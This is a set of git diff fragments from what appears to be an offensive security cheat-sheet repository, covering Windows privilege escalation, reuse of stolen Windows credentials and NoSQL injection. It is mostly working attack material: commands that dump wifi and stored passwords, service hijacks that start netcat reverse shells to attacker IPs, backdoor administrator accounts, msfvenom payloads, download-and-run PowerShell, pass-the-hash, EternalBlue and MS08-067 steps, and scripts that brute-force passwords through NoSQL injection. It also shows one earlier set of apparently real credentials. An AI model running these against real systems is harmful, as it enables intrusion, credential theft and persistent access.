 %WINDIR%\System32\drivers\etc\hosts
 dir c:*vnc.ini /s /b
 dir c:*ultravnc.ini /s /b
 ```
 ### Wifi passwords
 Find AP SSID
 ```bat
 netsh wlan show profile
 ```
 Get Cleartext Pass
 ```bat
 netsh wlan show profile <SSID> key=clear
 ```
 Oneliner method to extract wifi passwords from all the access point.
 ```batch
 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
 ```
 ### Passwords stored in services
 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
 ```powershell
 https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
 Import-Module path\to\SessionGopher.ps1;
 Invoke-SessionGopher -AllDomain -o
 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ```
 ## EoP - Processes Enumeration and Tasks
 What processes are running?
 ```powershell
 tasklist /v
 net start
 sc query
 Get-Service
 Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
 ```
 Which processes are running as "system"
@@ -187,36 +399,376 @@ Do you have powershell magic?
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
-## Uploading / Downloading files
+List installed programs
 a wget using powershell
 ```powershell
-powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
+Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
 Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 ```
-wget using bitsadmin (when powershell is not present)
+List services
 ```powershell
-cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
+net start
 wmic service list brief
 tasklist /SVC
 ```
-now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
+Scheduled tasks
 ```powershell
-%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
+schtasks /query /fo LIST 2>nul | findstr TaskName
 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 ```
-## Spot the weak service using PowerSploit's PowerUP
+Startup tasks
 ```powershell
-powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+wmic startup get caption,command
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
 dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
 dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 ```
-## Thanks to
+## EoP - Incorrect permissions in services
 > A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
 Often, services are pointing to writeable locations:
 - Orphaned installs, not installed anymore but still exist in startup
 - DLL Hijacking
 - PATH directories with weak permissions
 ```powershell
 $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
 $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
 $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
 FOR /F %i in (Servicenames.txt) DO echo %i
 type Servicenames.txt
 FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
 FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
 ```
 Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
 Note to check file permissions you can use `cacls` and `icacls`
 > icacls (Windows Vista +)    
 > cacls (Windows XP)
 You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or  `BUILTIN\Users:(W)`(Write-only access) in the output.
 ### Example with Windows XP SP1
 ```powershell
 # NOTE: spaces are mandatory for this exploit to work !
 sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
 sc config upnphost obj= ".\LocalSystem" password= ""
 sc qc upnphost
 sc config upnphost depend= ""
 net start upnphost
 ```
 If it fails because of a missing dependency, try the following commands.
 ```powershell
 sc config SSDPSRV start=auto
 net start SSDPSRV
 net stop upnphost
 net start upnphost
 sc config upnphost depend=""
 ```
 Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
 ```powershell
 $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
 RW SSDPSRV
        SERVICE_ALL_ACCESS
 RW upnphost
        SERVICE_ALL_ACCESS
 $ accesschk.exe -ucqv upnphost
 upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
 $ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
 $ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
 $ sc stop <vuln-service>
 $ sc start <vuln-service>
 $ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
 $ sc stop <vuln-service>
 $ sc start <vuln-service>
 ```
 ## EoP - Windows Subsystem for Linux (WSL)
 Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
 > With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
 ```powershell
 wsl whoami
 ./ubuntun1604.exe config --default-user root
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
 Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
 ## EoP - Unquoted Service Paths
 The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
 ```powershell
 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
 Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
 ### Example
 For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
 - `C:\Program.exe`
 - `C:\Program Files.exe`
 ## EoP - Kernel Exploitation
 List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
 ##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System  
 - [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017) 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)
 - [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 - [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 - [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833)   [SMBv3 Null Pointer Dereference Denial of Service]    (Windows 8.1/Server 2012 R2)
 - [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)   [Win32k Elevation of Privilege Vulnerability]    (Windows 7 SP1/2008 SP2,2008 R2 SP1)
 - [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010) 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
 - [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135) 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
 - [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111) 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)
 - [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
 - [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
 - [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034) 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)
 - [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032) 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
 - [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016) 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
 - [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014) 　[K3134228]　　[remote code execution]　　(2008/Vista/7)    
 ...
 - [MS03-026](./MS03-026) 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)  
 To cross compile a program from Kali, use the following command.
 ```powershell
 Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
 ```
 ## EoP - AlwaysInstallElevated
 Check if these registry values are set to "1".
 ```bat
 $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 ```
 Then create an MSI package and install it.
 ```powershell
 $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
 $ msiexec /quiet /qn /i C:\evil.msi
 ```
 Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
 ## EoP - Insecure GUI apps
 Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
 Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
 ## EoP - Runas
 Use the `cmdkey` to list the stored credentials on the machine.
 ```powershell
 cmdkey /list
 Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator
 ```
 Then you can use `runas` with the `/savecred` options in order to use the saved credentials. 
 The following example is calling a remote binary via an SMB share.
 ```powershell
 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
 ```
 Using `runas` with a provided set of credential.
 ```powershell
 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
 ```
 ```powershell
 $ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
 $ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
 $ computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 ## EoP - Common Vulnerabilities and Exposure
 ### Token Impersonation (RottenPotato)
 Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
 ```c
 getuid
 getprivs
 use incognito
 list\_tokens -u
 cd c:\temp\
 execute -Hc -f ./rot.exe
 impersonate\_token "NT AUTHORITY\SYSTEM"
 ```
 ```powershell
 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 ### MS08-067 (NetAPI)
 Check the vulnerability with the following nmap script.
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
 ```
 Metasploit modules to exploit `MS08-067 NetAPI`.
 ```powershell
 exploit/windows/smb/ms08_067_netapi
 ```
 If you can't use Metasploit and only want a reverse shell.
 ```powershell
 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
 Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
 Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
 Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
 Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
 Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
 python ms08-067.py 10.0.0.1 6 445
 ```
 ### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 
 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
 ```powershell
 https://www.exploit-db.com/exploits/11199
 Metasploit : exploit/windows/local/ms10_015_kitrap0d
 ```
 ### MS11-080 (afd.sys) - Microsoft Windows XP/2003
 ```powershell
 Python: https://www.exploit-db.com/exploits/18176
 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
 ```
 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 Check if the patch is installed : `wmic qfe list | findstr "3139914"`
 ```powershell
 Powershell:
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
 Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
 ### MS17-010 (Eternal Blue)
 Check the vulnerability with the following nmap script.
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
 ```
 Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
 ```powershell
 auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
 auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
 exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
 exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
 ```
 If you can't use Metasploit and only want a reverse shell.
 ```powershell
 git clone https://github.com/helviojunior/MS17-010
 # generate a simple reverse shell to use
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
 python2 send_and_execute.py 10.0.0.1 revshell.exe
 ```
 ## References
 * [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
 * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
 * [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
 * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
 * [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
 * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
 * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
 * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
 * [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
 * [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
 * [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
 * [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
 * [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
 * [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
 * [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) 
 * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
 * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -3,8 +3,11 @@
 ## TIP 1 - Create your credential :D
 ```powershell
-net user hacker hacker /add
+net user hacker hacker1234* /add
 net localgroup administrators hacker /add
 net localgroup "Remote Desktop Users" hacker /add # RDP access
 net localgroup "Backup Operators" hacker /add # Full access to files
 net group "Domain Admins" hacker /add /domain
 ```
 Some info about your user
@@ -23,13 +26,24 @@ Username: RetailAdmin
 Password: trs10
 ```
 ## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
 Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
 ```powershell
 \\windowssandbox
 Username: wdagutilityaccount
 Password: pw123
 ```
 ## Metasploit - SMB
 ```c
 use auxiliary/scanner/smb/smb_login  
-set SMBDomain CSCOU  
+set SMBDomain DOMAIN  
-set SMBUser jarrieta
+set SMBUser username
-set SMBPass nastyCutt3r
+set SMBPass password
 services -p 445 -R  
 run
 creds
@@ -42,8 +56,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
-set SMBUser jarrieta
+set SMBUser username
-set SMBPass nastyCutt3r
+set SMBPass password
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
@@ -53,8 +67,8 @@ shell
 ```python
 git clone https://github.com/byt3bl33d3r/CrackMapExec.github
-python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
+python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
-python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
+python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
 ```
 ## Crackmapexec (Pass The Hash)
@@ -66,23 +80,29 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55
 ## Winexe (Integrated to Kali)
 ```python
-winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
+winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
 ```
 ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
 ```python
 git clone https://github.com/CoreSecurity/impacket.git
-python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
+python psexec.py DOMAIN/username:password@10.10.10.10
-python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
+python smbexec.py DOMAIN/username:password@10.10.10.10
-python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
+python wmiexec.py DOMAIN/username:password@10.10.10.10
 # psexec.exe -s cmd
 # switch admin user to NT Authority/System
 ```
 ## RDP Remote Desktop Protocol (Impacket)
 ```powershell
-python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
+python rdpcheck.py DOMAIN/username:password@10.10.10.10
-rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
+rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
 rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 # -g : the screen will take up 70% of your actual screen size
 # -r disk:share : sharing a local folder during a remote desktop session 
 ```
 Note: you may need to enable it with the following command
@@ -105,39 +125,41 @@ or with crackmapexec
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
-For Server 2012 R2, Win8.1+
+or with Metasploit
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
 ```
 with Metasploit
 ```powershell
 run getgui -u admin -p 1234
 ```
 Then log in using xfreerdp 
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
 xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 ## Netuse (Windows)
 ```powershell
-net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
+net use \\ordws01.cscou.lab /user:DOMAIN\username password
 C$
 ```
 ## Runas (Windows - Kerberos auth)
 ```powershell
-runas /netonly /user:CSCOU\jarrieta "cmd.exe"
+runas /netonly /user:DOMAIN\username "cmd.exe"
 ```
 ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
 ```powershell
-PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
+PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
-PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
+PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get System shell
 ```
-## Thanks
+## References
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
--- a/injection/Intruders/NoSQL.txt
+++ b/injection/Intruders/NoSQL.txt
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -0,0 +1,147 @@
 # NoSQL injection
 > NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
 ## Summary
 * [Tools](#tools)
 * [Exploit](exploits)
  * [Authentication Bypass](#authentication-bypass)
  * [Extract length information](#extract-length-information)
  * [Extract data information](#extract-data-information)
 * [Blind NoSQL](#blind-nosql)
  * [POST with JSON body](#post-with-json-body)
  * [GET](#get)
 * [MongoDB Payloads](#mongodb-payloads)
 * [References](#references)
 ## Tools
 * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
 ## Exploit
 ### Authentication Bypass
 Basic authentication bypass using not equal ($ne) or greater ($gt)
 ```json
 in URL
 username[$ne]=toto&password[$ne]=toto
 in JSON
 {"username": {"$ne": null}, "password": {"$ne": null}}
 {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
 {"username": {"$gt": undefined}, "password": {"$gt": undefined}}
 {"username": {"$gt":""}, "password": {"$gt":""}}
 ```
 ### Extract length information
 ```json
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 ```
 ### Extract data information
 ```json
 in URL
 username[$ne]=toto&password[$regex]=m.{2}
 username[$ne]=toto&password[$regex]=md.{1}
 username[$ne]=toto&password[$regex]=mdp
 username[$ne]=toto&password[$regex]=m.*
 username[$ne]=toto&password[$regex]=md.*
 in JSON
 {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
 {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
 {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
 ```
 Extract data with "in"
 ```json
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
 ## Blind NoSQL
 ### POST with JSON body
 ```python
 import requests
 import urllib3
 import string
 import urllib
 urllib3.disable_warnings()
 username="admin"
 password=""
 u="http://example.org/login"
 headers={'content-type': 'application/json'}
 while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
 ```
 ### GET
 ```python
 import requests
 import urllib3
 import string
 import urllib
 urllib3.disable_warnings()
 username='admin'
 password=''
 u='http://example.org/login'
 while True:
  for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
      r = requests.get(u + payload)
      if 'Yeah' in r.text:
        print("Found one more char : %s" % (password+c))
        password += c
 ```
 ## MongoDB Payloads
 ```bash
 true, $where: '1 == 1'
 , $where: '1 == 1'
 $where: '1 == 1'
 ', $where: '1 == 1'
 1, $where: '1 == 1'
 { $ne: 1 }
 ', $or: [ {}, { 'a':'a
 ' } ], $comment:'successful MongoDB injection'
 db.injection.insert({success:1});
 db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
 || 1==1
 ' && this.password.match(/.*/)//+%00
 ' && this.passwordzz.match(/.*/)//+%00
 '%20%26%26%20this.password.match(/.*/)//+%00
 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
 {$gt: ''}
 [$ne]=1
 ```
 ## References
 * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
 * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
 * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,92 +0,0 @@
 # NoSQL injection
 NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
 ## Exploit
 Basic authentication bypass using not equal ($ne) or greater ($gt)
 ```json
 in URL
 username[$ne]=toto&password[$ne]=toto
 in JSON
 {"username": {"$ne": null}, "password": {"$ne": null} }
 {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
 {"username": {"$gt": undefined}, "password": {"$gt": undefined} }
 ```
 Extract length information
 ```json
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 ```
 Extract data information
 ```json
 in URL
 username[$ne]=toto&password[$regex]=m.{2}
 username[$ne]=toto&password[$regex]=md.{1}
 username[$ne]=toto&password[$regex]=mdp
 username[$ne]=toto&password[$regex]=m.*
 username[$ne]=toto&password[$regex]=md.*
 in JSON
 {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
 {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
